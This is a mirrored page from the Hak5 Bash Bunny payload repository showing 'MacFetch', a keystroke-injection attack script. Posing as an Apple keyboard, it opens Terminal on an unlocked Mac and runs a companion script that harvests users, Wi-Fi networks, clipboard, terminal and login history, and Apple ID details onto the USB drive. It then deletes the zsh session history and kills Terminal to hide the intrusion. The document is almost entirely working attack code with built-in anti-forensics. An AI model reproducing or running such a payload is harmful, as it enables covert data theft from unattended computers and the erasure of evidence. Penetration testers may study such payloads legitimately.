mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
63 lines
1.6 KiB
Bash
63 lines
1.6 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: MacFetch
|
|
# Description: Get a bunch of delicious data from unlocked macOS devices.
|
|
# Author: 90N45
|
|
# Version: 1.0
|
|
# Category: Recon
|
|
# Attackmodes: HID, STORAGE
|
|
#
|
|
# Saving the following Data:
|
|
# - Current User
|
|
# - All Users
|
|
# - Hostname
|
|
# - WiFi Interface
|
|
# - Current WiFi Connection State
|
|
# - Preferred WiFi Networks
|
|
# - Known Bluetooth Devices
|
|
# - Clipboard
|
|
# - Public IP
|
|
# - Open Network Ports
|
|
# - Applications
|
|
# - Applications Starting at System Boot/Login
|
|
# - Software and Hardware Information
|
|
# - Terminal History
|
|
# - Login History
|
|
# - Apple ID Information
|
|
# - Ifconfig output
|
|
|
|
LED SETUP
|
|
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
|
|
GET SWITCH_POSITION
|
|
|
|
LED ATTACK
|
|
# Open terminal
|
|
QUACK GUI SPACE
|
|
QUACK DELAY 1000
|
|
QUACK STRING terminal
|
|
QUACK ENTER
|
|
QUACK DELAY 1500
|
|
|
|
# Run fetch.sh script from BB (faster than writing all commands via HID)
|
|
QUACK STRING "chmod +x /Volumes/BashBunny/payloads/${SWITCH_POSITION}/fetch.sh && bash /Volumes/BashBunny/payloads/${SWITCH_POSITION}/fetch.sh"
|
|
QUACK ENTER
|
|
|
|
QUACK DELAY 3000
|
|
|
|
LED CLEANUP
|
|
# Delete bash variables
|
|
QUACK STRING unset date user users host wifi_interface current_wifi preffered_wifi bt_devices clipboard public_ip ports apps login_apps ware_info term_history login appleid ifaceconf
|
|
QUACK ENTER
|
|
# Eject BB storage
|
|
QUACK STRING diskutil eject /Volumes/BashBunny/
|
|
QUACK ENTER
|
|
# Remove terminal history from current session (commands used in attack won't be visible with the history command)
|
|
QUACK STRING "rm -r ~/.zsh_sessions"
|
|
QUACK ENTER
|
|
# Exit terminal
|
|
QUACK STRING killall Terminal
|
|
QUACK ENTER
|
|
|
|
sync
|
|
|
|
LED FINISH |